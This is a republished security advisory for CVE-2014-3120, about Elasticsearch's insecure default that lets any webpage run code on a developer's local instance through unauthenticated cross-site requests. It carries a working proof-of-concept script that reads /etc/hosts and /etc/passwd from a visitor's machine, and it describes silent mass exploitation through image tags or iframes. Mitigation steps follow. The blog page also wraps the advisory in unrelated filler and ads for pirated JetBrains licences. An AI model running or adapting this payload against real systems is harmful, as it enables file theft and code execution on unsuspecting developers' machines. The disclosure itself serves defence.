Insecure default in Elasticsearch enables remote code execution

Insecure default in Elasticsearch enables remote code execution

大家好,又见面了,我是全栈君,今天给大家准备了Idea注册码。

Elasticsearch has a flaw in its default configuration which makes it possible for any webpage to execute arbitrary code on visitors with Elasticsearch installed. If you’re running Elasticsearch in development please read the instructions on how to secure your machine. Elasticsearch version 1.2 (which is unreleased as of writing) is not vulnerable to remote code execution, but still has some security concerns.

The problem(s)

There are a couple of problems which enable the proof of concept I’m going to present:

  • Elasticsearch has no access roles or authentication mechanism. This means that you have full control over a cluster the moment you connect to it.
  • The API for Elasticsearch is accessible over HTTP and provides no CSRF protection whatsoever.
  • It contains a feature which makes it possible to evaluate expressions as part of a query. An example usage of this feature is to specify a custom scoring function while searching through documents. It uses the MVEL language by default.
  • Up to version 1.2 dynamic scripting (which makes it possible to send scripts to the cluster on the fly) was enabled by default. As mentioned in the documentation, this feature gives someone the same priviliges as the user that runs Elasticsearch. MVEL has no sandboxing at all.

There are no issues up to this point as long as you properly follow the documentation and make sure your Elasticsearch cluster is not available from the outside world. There is one target that isn’t mentioned in the documentation though: The Developer! When you’re developing an application that uses Elasticsearch, you probably have it running on your machine. The default port is 9200 and because there is no CSRF protection any webpage can just connect to the cluster using localhost:9200 as the host.

PoC

The following script will read /etc/hosts and /etc/passwd from a user visiting a webpage and display the contents in the browser.

read_file = (filename) ->
  """
 import java.io.File;
 import java.util.Scanner;
 new Scanner(new File("#{filename}")).useDelimiter("\\\\Z").next();
 """

# This PoC assumes that there is at least one document stored in Elasticsearch, there are ways around that though
$ ->
  payload = {
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {}
  }

  for filename in ["/etc/hosts", "/etc/passwd"]
    payload["script_fields"][filename] = {"script": read_file(filename)}

  $.getJSON "http://localhost:9200/_search?source=#{encodeURIComponent(JSON.stringify(payload))}&callback=?", (data) ->
    console.log(data)
    for hit in data["hits"]["hits"]
      for filename, contents of hit["fields"]
        document.write("<h2>#{filename}</h2>")
        for content in contents
          document.write("<pre>" + content + "</pre>")
        document.write("<hr>")

You can verify whether you’re vulnerable by trying out the above PoC here.

There are many ways to exploit this, you could link the victim to the page or embed it as an Iframe. You can even exploit this by crafting a URL and using it as the src of an <img>, as the only thing that needs to happen is a single GET request. No user interaction required!

Because this is so easily exploitable you can mass-pwn developers with relatively little work.

How to secure against this vulnerability

Add the following line to your elasticsearch.yml to disable dynamic scripting and prevent remote code execution:

script.disable_dynamic: true

You should also make sure that your local Elasticsearch instance is only binding onlocalhost, as someone could exploit you over LAN without making you visit a webpage if you don’t. The Homebrew Elasticsearch formula does this automatically. This still means you’re vulnerable to the CSRF exploit though!

If you want to be as secure as possible, you should run Elasticsearch inside a virtual machine, to make sure it has no access to the hosting machine at all.

Additional targets

Disabling scripting will prevent code execution, but that still leaves us with the issue of being able to query and administer the instance without limit. A webpage can easily dump the whole database running on your machine, sensitive data included. This is impossible to fix by the Elasticsearch developers without adding authentication or CSRF protection.

If an attacker can figure out the internal address of your production Elasticsearch instance, you’re also open to leaking your production data. If your development machine is connected to a VPN which provides access to your Elasticsearch cluster, an attacker can easily query or shut down your cluster simply by making you visit a webpage.

Hackernews

Reddit

Notes

  • I have reserved CVE-2014-3120 for this issue.
  • This exploit was tested against Elasticsearch version 1.1.1 on MacOSX installed through Homebrew. No configuration changes were made.
  • I notified Elasticsearch through their security report instructions on the 26th of April 2014. They replied they were aware of it, but didn’t intend to do a security release and instead disable dynamic scripting by default in version 1.2.
  • This security issue has been indepently discovered and blogged about on December 9th 2013.
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/117522.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • strtoul函数的使用

    strtoul函数的使用函数原型:参数1:字符串起始地址参数2:返回字符串有效数字的结束地址,这也是为什么要用二级指针的原因。参数3:转换基数。当base=0,自动判断字符串的类型,并按10进制输出,例如"0xa

  • mysql的text与tinytext,MySQL中的VARCHAR(255)和TINYTEXT字符串类型有什么区别?

    mysql的text与tinytext,MySQL中的VARCHAR(255)和TINYTEXT字符串类型有什么区别?What’sthedifferencebetweenVARCHAR(255)andTINYTEXTstringtypesinMySQL?Eachofthemallowstostorestringswithamaximumlengthof255characters.Storagerequirementsarealsothesame.When…

  • java wifi开发教程_WiFi技术「建议收藏」

    java wifi开发教程_WiFi技术「建议收藏」WiFi技术啥MU-MIMO:多用户-多输入多输出2x2MIMO:2个输入in,2个输出out。?一根天线既做接收也做发送,2×2即两根天线,同理4×4即为4根天线?RedmiAX6共6根天线,4根作为5G天线,2根作为2.4G天线RedmiAX6支持2x2160MHz及4x480MHz两种MU-MIMO工作模式802.11对照表协议频宽(MHz)单天线速率(Mbps…

  • linux查看内核版本_ubuntu查看内核版本号

    linux查看内核版本_ubuntu查看内核版本号文章目录前言一、使用`uname`命令查看二、使用`hostnamectl`命令查看三、通过查看`/proc/version`文件确认四、使用`/etc/issue`查看五、使用`lsb_release-a`查看前言以Ubuntu为例,介绍几个用来查看系统与内核版本的命令,拿起小本本记录下来!镜像下载地址:https://mirrors.tuna.tsinghua.edu.cn/一、使用uname命令查看uname命令显示多个系统信息,包括Linux内核体系结构,名称版本和

    2022年10月13日
  • centos强制删除非空文件夹

    centos强制删除非空文件夹命令详情: rm -rf /var/www/html 上面命令会强制删除html这个文件夹,即使是非空文件夹,也会删除,使用的时候要小心加谨慎,linux没有回收站,所以一定要谨慎操作。

  • 网盘lua调用失败(dumb down)

    前阵子在弄一个dump程序的时候遇到这样一个问题.
    dump程序在被dump程序debug情况下一切正常,release版本下调用了minidumpwritedump函数进行dump,但是minidumpwritedump函数调用失败,GetLastError()获得到的是一个不正常的大数.
    在网络上久寻未果,遇到同样问题的人都没有提出最后的解决方案,也尝试过修改项目设置等一系列方法,没有解决.
     
    有一天想重新研究这个问题,看这个帖子http://app

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号